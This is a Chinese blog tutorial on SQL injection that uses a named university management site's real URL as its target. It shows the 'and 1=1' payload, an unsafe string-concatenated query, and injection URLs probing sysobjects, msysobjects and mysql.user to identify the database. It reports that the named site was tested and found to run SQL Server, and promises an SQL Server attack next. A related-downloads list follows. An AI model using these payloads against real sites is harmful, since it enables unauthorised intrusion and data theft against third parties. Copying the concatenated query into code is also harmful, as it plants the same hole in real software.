我们接着讲对数据库系统表的攻击 。
我们还是以中南大学党校管理系统为例子。
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and 1=1
如果后台是有漏洞的 后台代码如下写
String id=request.getparameter("id");
select * from table where id = id;
那么此时得到的id 为 41 and 1=1
执行的sql语句为
select * from table where id=41 and 1=1
这种情况id=41存在的话。那么where后面的语句总是执行为对的。
首先我们攻击的第一步需要知道它是什么类型的数据库
access 的msysobjects 这个在默认情况下不能访问
sql server 的sysobjects 在默认情况下可以访问
mysql 的user 在默认情况下可以访问
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from sysobjects )>0
如何执行这个的效果和不加select count(*) 语句出现的页面效果一致的话,那么此系统为sqlserver。
后台的sql语句执行代码如下
select * from table where id=41 and (select count(*) from sysobjects) >0
那么此时where条件成立则和id=41出现的页面是一致的。
而如果
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from sysobjects )>0
和
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from msysobjects )>0
都执行不成功的话,那么则考虑是不是access 。
如果执行下述代码成功的话,则为mysql
mysql> select * from admin where (select count(*) from mysql.user)>0;
+----+-------+-------+
| id | name | pwd |
+----+-------+-------+
| 1 | admin | admin |
+----+-------+-------+
1 row in set (0.12 sec)
也就是url写成
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from mysql.user )>0
这种情况下返回的页面还和id=41一样的话那么。则此系统为mysql 。
中南大学党校管理管理系统经测试是用sqlserver做数据库的。
其实,我们根据经验可以想想 。现在国内70%以上的网站是用asp做的。而asp是微软做的。此外。access和sqlserver也都是微软做的。所以的话我们根据这个依据。有理由相信asp页面的关联数据库是access和sqlserver两个中的一个。而不是非微软制造的mysql。
如果是php页面那么我们就考虑mysql。而如果是jsp的话,那么考虑mysql的情况也是比较多的。
这一章讲了如何查看该网站所使用的数据库类型。
下节讲就对sqlserver数据库进行攻击。
分享到:
相关推荐
NULL 博文链接:https://1035054540-qq-com.iteye.com/blog/1526731
ASP.NET源码——[论坛社区]Discuz!NT For SQL Server v1.0源码.zip
ASP.NET源码——[论坛社区]Discuz!NT for SQL Server v1.0正式版.zip
ASP.NET源码——[论坛社区]Discuz!NT v2.5 Build 081029 SQL For .Net.zip
ASP.NET源码——[论坛社区]Discuz!NT v2.5 SQL For .Net2.0 源码版.zip
SQL注入简单总结——过滤逗号注入
SQL注入攻击,信息安全专业必学内容,希望对大家有所帮助
Sql Server——Sql性能优化Sql Server——Sql性能优化Sql Server——Sql性能优化Sql Server——Sql性能优化Sql Server——Sql性能优化Sql Server——Sql性能优化Sql Server——Sql性能优化Sql Server——Sql性能优化
SQL注入式攻击下的数据库安全——SQL Server下SQL注入攻击的有效防范.pdf
SQL注入漏洞全接触 注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上对它的讨论很...12. SQL注入渗透某网络安全公司的网站全过程 42 13.利用SQL注入2分钟入侵网站全程实录 45
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
SQL注入测试.zip 具体操作步骤和说明文档。
sql注入技术 各种函数注入的原理以及方法
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
web安全性测试sql注入高级篇web安全性测试sql注入高级篇web安全性测试sql注入高级篇
初识SQL注入,揭密SQL注入攻击,有兴趣的可以当作入门参考!
SQL注入防护——从一款注入工具入侵原理入手.pdf